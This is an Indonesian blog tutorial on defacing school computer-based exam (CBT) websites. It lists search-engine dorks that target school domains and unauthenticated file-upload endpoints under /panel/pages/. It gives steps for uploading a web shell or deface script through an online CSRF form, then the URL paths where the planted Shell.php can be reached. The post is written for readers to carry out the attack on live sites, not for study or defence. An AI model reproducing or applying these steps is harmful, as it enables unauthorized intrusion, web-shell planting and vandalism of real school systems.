deface poc cbt, tutorial deface poc cbt
mazapip.blogspot.com - halo gaes balik lagi sama gua Maz Apip kali ini gua bakal kasih tutorial Deface Poc CBT with csrf
Bahan:
-Hp/Pc
-Dork
-Exploit
-Shell & Sc Deface
{#}Dork
inurl:/login.php intitle:ujian online
inurl:/cbt/login.php site:sch.id
inurl:/login.php intitle:cbt beesmart
inurl:/login.php inurl:/cbt
inurl:/login.php intitle:ujian sekolah
inurl:/login.php intitle:ujian sma
{#}Exploit
/panel/pages/upload-file.php
/panel/pages/upload_video.php
/panel/pages/upload_audio.php
/panel/pages/upload_gambar.php
/panel/pages/upload-file.php
/panel/pages/upload-fotosiswa.php
/panel/pages/upload-banner.php
/panel/pages/upload-logo.php
1.Kalian ngedork buat nyari target nya
2.Paste Exploit
Kalo Udah Nemu Web nya,kalian paste Exploit nya dibelakang web
target.com/[path]/exploit
target.com/exploit
3.Check
Nah Kalo Blank Kek gitu tanda nya vuln
langsung aja kalian masuk ke csrf online nya
Baca Juga Situs Yang Menyediakan Tools Hacking
4.Eksekusi
Kalian Paste Target+Exploit seperti di atas
lalu isi post file dengan uploadfile
Langsung Aja Kalian Lock Target,Lalu Uplad Script/Shell Kalian
Baca Juga Kumpulan Shell Bypass
Nah Kalo Tulisan Nya Success Berati Berhasil Cuy
Cara Akses Nya ?
target.com/images/Shell.php
target.com/pictures/Shell.php
target.com/video/Shell.php
jika ada path,maka tambahin di belakang path
target.com/[path]/images/Shell.php
target.com/[path]/pictures/Shell.php
target.com/[path]/video/Shell.php